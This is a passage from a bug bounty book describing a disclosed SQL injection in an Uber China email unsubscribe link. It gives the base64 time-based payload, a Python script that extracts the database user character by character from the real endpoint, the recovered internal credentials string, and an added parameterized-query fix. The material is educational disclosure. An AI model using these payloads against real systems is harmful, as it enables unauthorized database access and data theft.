- Bug Bounty Hunting Essentials
- Carlos A. Lozano, Shahmeer Amir
- 351 words
- 2021-06-10 18:35:34
Uber SQL injection
- Title: SQL injection on sctrack.email.uber.com.cn.
- Reported by: Orange.
- Bounty Rewarded: $4,000.
- Web application URL: http://sctrack.email.uber.com.cn.
- Description: Uber is a famous ride-hailing service, one of the biggest in the world, used in many cities by people who want to get from one place to another. The reporter in this case, Orange Tsai, a well-known bug bounty hunter, traveled to China and called an Uber. Uber sends marketing emails to riders based on their location, and, like any rider, the first thing to do is to unsubscribe from that email. That is what Orange did, but bug bounty hunters have keen eyes: Orange observed that the unsubscribe link he received in China was different from the one he received under normal circumstances. Reviewing the original report, the URL looked something like this: http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==.
The p parameter carries a string that is sent to the backend server once the link is visited. That string is base64-encoded text into which a time-based SQL payload has been placed. Decoding it shows that p holds two fields: user_id, the user identifier, and receiver, the receiving email address. Orange found that he could put a time-based SQL string into the user_id field, which looks something like this:
{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
If the injected condition is evaluated by the database, sleep(12) delays the response by 12 seconds. This is what we call the hello world of proofs of concept. From there, Orange wrote a script with which he could enumerate the current user and the database name, one character at a time. A snippet from the script is as follows (shown here with the imports it needs and Python 3 byte handling; the response check that reads out each character is not part of this snippet):

```python
import json
import string
from base64 import b64encode
from urllib.parse import quote
import requests

base = string.digits + '_-@.'   # characters expected in user()/database()
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):            # one character position per outer loop
    for i in 'i' + base:
        # boolean test on one character of user(); '#' comments out the rest
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#" % (l + 1, i)
        new_payload = json.dumps(payload)
        new_payload = b64encode(new_payload.encode()).decode()
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=' + quote(new_payload))
```

What the script does is craft a payload that tests one character of the result at a time and send it to the target server in an HTTP request; by observing how the server responds to each guess, the script recovered the current user and the database name:
sendcloud_w@10.9.79.210 sendcloud
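The root cause is that the decoded user_id was handed to the query as-is. The following is an added example, not code from the book or from Uber: a hardened unsubscribe handler that decodes the same p token, refuses any user_id that is not a plain integer, and binds the values as query parameters. The subscribers table and its single row are constructed for the demonstration.

```python
import base64
import json
import re
import sqlite3

# Token copied from the report's URL; it decodes to the injected user_id.
REPORTED_P = ("eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjog"
              "Im9yYW5nZUBteW1haWwifQ==")
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$")

def decode_p(p):
    # Decode the base64 JSON in ?p=... without trusting anything inside it.
    try:
        data = json.loads(base64.b64decode(p, validate=True).decode("utf-8"))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return None
    return data if isinstance(data, dict) else None

def validate_p(data):
    # Accept only an integer user_id and an email-shaped receiver, so a
    # user_id of '5755 and sleep(12)=1' is rejected before any query exists.
    if data is None:
        return None
    user_id, receiver = data.get("user_id"), data.get("receiver")
    if isinstance(user_id, str) and user_id.isdigit():
        user_id = int(user_id)
    if isinstance(user_id, bool) or not isinstance(user_id, int) or user_id <= 0:
        return None
    if not isinstance(receiver, str) or not EMAIL_RE.match(receiver):
        return None
    return user_id, receiver

def unsubscribe(conn, p):
    # Hardened handler: values reach the database only as bound parameters.
    fields = validate_p(decode_p(p))
    if fields is None:
        return False
    cur = conn.execute("UPDATE subscribers SET subscribed = 0 "
                       "WHERE id = ? AND email = ? AND subscribed = 1", fields)
    return cur.rowcount == 1

def demo():
    # One constructed subscriber row; the injected token must change nothing.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (id INTEGER, email TEXT, subscribed INTEGER)")
    conn.execute("INSERT INTO subscribers VALUES (5755, 'orange@mymail', 1)")
    benign = base64.b64encode(json.dumps(
        {"user_id": 5755, "receiver": "orange@mymail"}).encode()).decode()
    return unsubscribe(conn, REPORTED_P), unsubscribe(conn, benign)
```

Even if validation were bypassed, the bound parameters mean the database would look for a user whose id literally equals the injected string rather than executing it.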